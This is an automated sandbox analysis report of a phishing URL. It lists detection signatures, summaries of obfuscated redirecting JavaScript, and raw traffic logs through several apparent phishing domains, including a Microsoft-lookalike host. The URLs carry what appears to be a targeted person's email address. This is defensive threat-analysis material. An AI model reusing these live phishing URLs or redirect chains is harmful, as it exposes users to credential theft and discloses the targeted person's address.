Joe Sandbox Cloud Basic Analysis Report
Edit tour

Windows Analysis Report
https://ucarecdn.com/6e80a848-4922-47e6-9a12-2e73d2540050/8ff754f5-7513-4298-9573-17aa31ff5b5c.html

Overview

General Information

Sample URL:https://ucarecdn.com/6e80a848-4922-47e6-9a12-2e73d2540050/8ff754f5-7513-4298-9573-17aa31ff5b5c.html
Analysis ID:1662266
Infos:

Detection

Score:52
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for URL or domain
AI detected suspicious Javascript
Creates files inside the system directory
Deletes files inside the Windows folder

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious

Process Tree

  • System is w10x64
  • chrome.exe (PID: 3976 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 4840 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2332,i,1114976431534499065,153738974873917783,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2384 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
  • chrome.exe (PID: 7040 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://ucarecdn.com/6e80a848-4922-47e6-9a12-2e73d2540050/8ff754f5-7513-4298-9573-17aa31ff5b5c.html" MD5: E81F54E6C1129887AEA47E7D092680BF)
  • chrome.exe (PID: 3256 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 6120 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --metrics-shmem-handle=1948,i,2868179512277568459,14568565378952564348,524288 --field-trial-handle=2028,i,3787505417702600662,9503551255279435640,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=2072 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
  • chrome.exe (PID: 2692 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Users\user\Downloads\8ff754f5-7513-4298-9573-17aa31ff5b5c.html" MD5: E81F54E6C1129887AEA47E7D092680BF)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

No Sigma rule has matched

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

  • AV Detection
  • Phishing
  • Compliance
  • Networking
  • System Summary

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://microsoftonelineda48b13627.cometlogistics.co.uk/?_da48b13627=bnBkL2lkZnVvZmVtcGhuYmlic2hBaHNmY3ZzYiRpcTBmZS9mbWpnZWZzYml0ZWJwbW94cGUwMDt0cXV1aQAvira URL Cloud: Label: phishing

Phishing

barindex
Source: 0.0..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: file:///C:/Users/user/Downloads/8ff754f5-7513-... This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and the use of obfuscated code/URLs. The script decrypts and executes a potentially malicious payload, which poses a significant security risk. Additionally, the script interacts with unknown domains, further increasing the likelihood of malicious intent. Overall, this script exhibits a high level of suspicion and should be treated as a high-risk security threat.
Source: 1.3..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://da48b13627.vk.com@microsoftonelineda48b136... This script demonstrates several high-risk behaviors, including dynamic code execution, obfuscated URLs, and potential data exfiltration. The use of `atob`, string reversal, and character code manipulation to decode a URL suggests malicious intent. Additionally, the script attempts to redirect the user to the decoded URL, which could lead to a phishing or malware attack. Overall, this script poses a significant security risk and should be treated with caution.
Source: 2.4..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://downloadsharedfile.de/ph... This script demonstrates several high-risk behaviors, including dynamic code execution via `eval()` and obfuscated code. It also appears to be attempting to set a persistent cookie with an expiration date in the future, which could be used for malicious purposes such as session hijacking or tracking. The script also checks for the presence of various browser automation and testing frameworks, which suggests it may be attempting to evade detection. Overall, this script exhibits a high degree of suspicious and potentially malicious behavior, and should be treated with caution.
Source: https://downloadsharedfile.de/ph#aruberg@grahamgoldentech.comHTTP Parser: No favicon
Source: https://downloadsharedfile.de/ph#aruberg@grahamgoldentech.comHTTP Parser: No favicon
Source: unknownHTTPS traffic detected: 142.251.35.164:443 -> 192.168.2.6:49694 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.130.132:443 -> 192.168.2.6:49697 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.130.132:443 -> 192.168.2.6:49698 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.17.24.14:443 -> 192.168.2.6:49700 version: TLS 1.2
Source: unknownHTTPS traffic detected: 167.172.166.226:443 -> 192.168.2.6:49703 version: TLS 1.2
Source: unknownHTTPS traffic detected: 167.172.166.226:443 -> 192.168.2.6:49702 version: TLS 1.2
Source: unknownHTTPS traffic detected: 167.172.166.226:443 -> 192.168.2.6:49704 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.7.120:443 -> 192.168.2.6:49706 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.7.120:443 -> 192.168.2.6:49705 version: TLS 1.2
Source: unknownHTTPS traffic detected: 142.251.35.164:443 -> 192.168.2.6:49730 version: TLS 1.2
Source: unknownHTTPS traffic detected: 167.172.166.226:443 -> 192.168.2.6:49731 version: TLS 1.2
Source: unknownHTTPS traffic detected: 167.172.166.226:443 -> 192.168.2.6:49731 version: TLS 1.2
Source: unknownHTTPS traffic detected: 167.172.166.226:443 -> 192.168.2.6:49732 version: TLS 1.2
Source: unknownHTTPS traffic detected: 167.172.166.226:443 -> 192.168.2.6:49736 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.7.120:443 -> 192.168.2.6:49738 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.7.120:443 -> 192.168.2.6:49737 version: TLS 1.2
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.91
Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.91
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.91
Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.91
Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.91
Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.91
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 142.251.40.99
Source: unknownTCP traffic detected without corresponding DNS query: 142.251.40.99
Source: unknownTCP traffic detected without corresponding DNS query: 142.251.40.99
Source: unknownTCP traffic detected without corresponding DNS query: 142.251.40.99
Source: unknownTCP traffic detected without corresponding DNS query: 142.251.40.99
Source: unknownTCP traffic detected without corresponding DNS query: 142.251.40.99
Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.91
Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.215
Source: unknownTCP traffic detected without corresponding DNS query: 142.251.40.99
Source: unknownTCP traffic detected without corresponding DNS query: 142.251.40.99
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /6e80a848-4922-47e6-9a12-2e73d2540050/8ff754f5-7513-4298-9573-17aa31ff5b5c.html HTTP/1.1Host: ucarecdn.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aruberg@grahamgoldentech.com HTTP/1.1Host: 33vh88.perthshiregardenrooms.co.ukConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /?_da48b13627=bnBkL2lkZnVvZmVtcGhuYmlic2hBaHNmY3ZzYiRpcTBmZS9mbWpnZWZzYml0ZWJwbW94cGUwMDt0cXV1aQ HTTP/1.1Host: microsoftonelineda48b13627.cometlogistics.co.ukConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ph HTTP/1.1Host: downloadsharedfile.deConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://microsoftonelineda48b13627.cometlogistics.co.uk/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: downloadsharedfile.deConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://downloadsharedfile.de/phAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: 6nazztWr2_vYBKIL095XywUIEHo=hySNCpLY3L_G7AxG2uogmQkPrkQ; 4Crie6P5m6cz0SbTCbKHc54ZGYc=1744305670; hfmgAOD8FUUtSJlHE9pwx4U8tKw=1744392070; c5-HLjPOoRjwDyfDreb6qqdoXS0=tlwPWXntsX01ojDNsRGIUyBUXk4; cgg8s1NXXpRq2X66Za7sUyKWTuU=yyHkUwzC6GAFIZ1gZhG8sGj_nkY
Source: global trafficHTTP traffic detected: GET /ph HTTP/1.1Host: downloadsharedfile.deConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://downloadsharedfile.de/phAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: 6nazztWr2_vYBKIL095XywUIEHo=hySNCpLY3L_G7AxG2uogmQkPrkQ; 4Crie6P5m6cz0SbTCbKHc54ZGYc=1744305670; hfmgAOD8FUUtSJlHE9pwx4U8tKw=1744392070; c5-HLjPOoRjwDyfDreb6qqdoXS0=tlwPWXntsX01ojDNsRGIUyBUXk4; cgg8s1NXXpRq2X66Za7sUyKWTuU=yyHkUwzC6GAFIZ1gZhG8sGj_nkY; zxP82kLZsbWiLJLakYRBhe_cRio=1744305670; m6LzT-_QW3fcpiodiHY68RdARWU=1744392070; QCa_rcD73k-ReIxngrj7ch1bedM=QBlweyg-Tsaz5eRtnAFwxEAO3qI
Source: global trafficHTTP traffic detected: GET /aruberg@grahamgoldentech.com HTTP/1.1Host: 33vh88.perthshiregardenrooms.co.ukConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /?_da48b13627=bnBkL2lkZnVvZmVtcGhuYmlic2hBaHNmY3ZzYiRpcTBmZS9mbWpnZWZzYml0ZWJwbW94cGUwMDt0cXV1aQ HTTP/1.1Host: microsoftonelineda48b13627.cometlogistics.co.ukConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9If-None-Match: W/"15f-3M0a/pOvegNm6djT5a7IX2bYDBE"
Source: global trafficHTTP traffic detected: GET /ph HTTP/1.1Host: downloadsharedfile.deConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://microsoftonelineda48b13627.cometlogistics.co.uk/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: 6nazztWr2_vYBKIL095XywUIEHo=hySNCpLY3L_G7AxG2uogmQkPrkQ; 4Crie6P5m6cz0SbTCbKHc54ZGYc=1744305670; hfmgAOD8FUUtSJlHE9pwx4U8tKw=1744392070; c5-HLjPOoRjwDyfDreb6qqdoXS0=tlwPWXntsX01ojDNsRGIUyBUXk4; cgg8s1NXXpRq2X66Za7sUyKWTuU=yyHkUwzC6GAFIZ1gZhG8sGj_nkY; zxP82kLZsbWiLJLakYRBhe_cRio=1744305670; m6LzT-_QW3fcpiodiHY68RdARWU=1744392070; QCa_rcD73k-ReIxngrj7ch1bedM=QBlweyg-Tsaz5eRtnAFwxEAO3qI
Source: global trafficHTTP traffic detected: GET /r/gsr1.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: */*If-Modified-Since: Tue, 07 Jan 2025 07:28:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog
Source: global trafficHTTP traffic detected: GET /r/r4.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: */*If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: ucarecdn.com
Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: 33vh88.perthshiregardenrooms.co.uk
Source: global trafficDNS traffic detected: DNS query: microsoftonelineda48b13627.cometlogistics.co.uk
Source: global trafficDNS traffic detected: DNS query: downloadsharedfile.de
Source: unknownHTTP traffic detected: POST /ph HTTP/1.1Host: downloadsharedfile.deConnection: keep-aliveContent-Length: 22sec-ch-ua-platform: "Windows"X-Requested-TimeStamp-Combination: X-Requested-TimeStamp: X-Requested-Type-Combination: GETsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0isII4MbvI2APurt5ZqwJQ7mZWdg: 29292434X-Requested-with: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36X-Requested-Type: GETContent-type: application/x-www-form-urlencodedX-Requested-TimeStamp-Expire: Accept: */*Origin: https://downloadsharedfile.deSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://downloadsharedfile.de/phAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: 6nazztWr2_vYBKIL095XywUIEHo=hySNCpLY3L_G7AxG2uogmQkPrkQ; 4Crie6P5m6cz0SbTCbKHc54ZGYc=1744305670; hfmgAOD8FUUtSJlHE9pwx4U8tKw=1744392070; c5-HLjPOoRjwDyfDreb6qqdoXS0=tlwPWXntsX01ojDNsRGIUyBUXk4; cgg8s1NXXpRq2X66Za7sUyKWTuU=yyHkUwzC6GAFIZ1gZhG8sGj_nkY
Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableDate: Thu, 10 Apr 2025 17:21:12 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeX-Content-Type-Options: nosniffX-Content-Type-Options: nosniffX-Xss-Protection: 1; mode=blockX-Xss-Protection: 1; mode=blockX-Frame-Options: SAMEORIGINCache-Control: public, max-age=0 no-store, no-cache, must-revalidate, post-check=0, pre-check=0Pragma: no-cacheExpires: 0Cf-Cache-Status: DYNAMICServer: cloudflareSet-Cookie: 6nazztWr2_vYBKIL095XywUIEHo=hySNCpLY3L_G7AxG2uogmQkPrkQ; Path=/; Max-Age=86400; Expires=Fri, 11 Apr 2025 17:21:10 GMTSet-Cookie: 4Crie6P5m6cz0SbTCbKHc54ZGYc=1744305670; Path=/; Max-Age=86400; Expires=Fri, 11 Apr 2025 17:21:10 GMTSet-Cookie: hfmgAOD8FUUtSJlHE9pwx4U8tKw=1744392070; Path=/; Max-Age=86400; Expires=Fri, 11 Apr 2025 17:21:10 GMTSet-Cookie: c5-HLjPOoRjwDyfDreb6qqdoXS0=tlwPWXntsX01ojDNsRGIUyBUXk4; Path=/; Max-Age=86400; Expires=Fri, 11 Apr 2025 17:21:10 GMTCF-RAY: 92e3eb55ec437b0b-EWRalt-svc: h3=":443"; ma=86400
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Apr 2025 17:21:13 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeServer: cloudflareVary: Accept-EncodingX-Content-Type-Options: nosniffX-Content-Type-Options: nosniffX-Xss-Protection: 1; mode=blockX-Xss-Protection: 1; mode=blockCache-Control: public, max-age=315360000, stale-while-revalidate=315360000, stale-if-error=315360000, immutablePragma: publicCf-Cache-Status: HITAge: 158916CF-RAY: 92e3eb5a9bc59cdd-EWRalt-svc: h3=":443"; ma=86400
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Apr 2025 17:21:14 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Content-Type-Options: nosniffX-Content-Type-Options: nosniffX-Xss-Protection: 1; mode=blockX-Xss-Protection: 1; mode=blockCf-Cache-Status: DYNAMICServer: cloudflareCF-RAY: 92e3eb5d4a8de8a6-EWRalt-svc: h3=":443"; ma=86400
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Apr 2025 17:22:31 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Content-Type-Options: nosniffX-Content-Type-Options: nosniffX-Xss-Protection: 1; mode=blockX-Xss-Protection: 1; mode=blockCf-Cache-Status: DYNAMICServer: cloudflareCF-RAY: 92e3ed42cac47ced-EWRalt-svc: h3=":443"; ma=86400
Source: 730862d1-2f7c-46c2-beaf-1f87665d08e6.tmp.1.dr, chromecache_159.3.drString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49697 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49681
Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49698 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49698
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49697
Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49694 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49694
Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
Source: unknownNetwork traffic detected: HTTP traffic on port 49681 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: unknownHTTPS traffic detected: 142.251.35.164:443 -> 192.168.2.6:49694 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.130.132:443 -> 192.168.2.6:49697 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.130.132:443 -> 192.168.2.6:49698 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.17.24.14:443 -> 192.168.2.6:49700 version: TLS 1.2
Source: unknownHTTPS traffic detected: 167.172.166.226:443 -> 192.168.2.6:49703 version: TLS 1.2
Source: unknownHTTPS traffic detected: 167.172.166.226:443 -> 192.168.2.6:49702 version: TLS 1.2
Source: unknownHTTPS traffic detected: 167.172.166.226:443 -> 192.168.2.6:49704 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.7.120:443 -> 192.168.2.6:49706 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.7.120:443 -> 192.168.2.6:49705 version: TLS 1.2
Source: unknownHTTPS traffic detected: 142.251.35.164:443 -> 192.168.2.6:49730 version: TLS 1.2
Source: unknownHTTPS traffic detected: 167.172.166.226:443 -> 192.168.2.6:49731 version: TLS 1.2
Source: unknownHTTPS traffic detected: 167.172.166.226:443 -> 192.168.2.6:49731 version: TLS 1.2
Source: unknownHTTPS traffic detected: 167.172.166.226:443 -> 192.168.2.6:49732 version: TLS 1.2
Source: unknownHTTPS traffic detected: 167.172.166.226:443 -> 192.168.2.6:49736 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.7.120:443 -> 192.168.2.6:49738 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.7.120:443 -> 192.168.2.6:49737 version: TLS 1.2
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\scoped_dir3976_755209614Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\scoped_dir3256_1208867069Jump to behavior
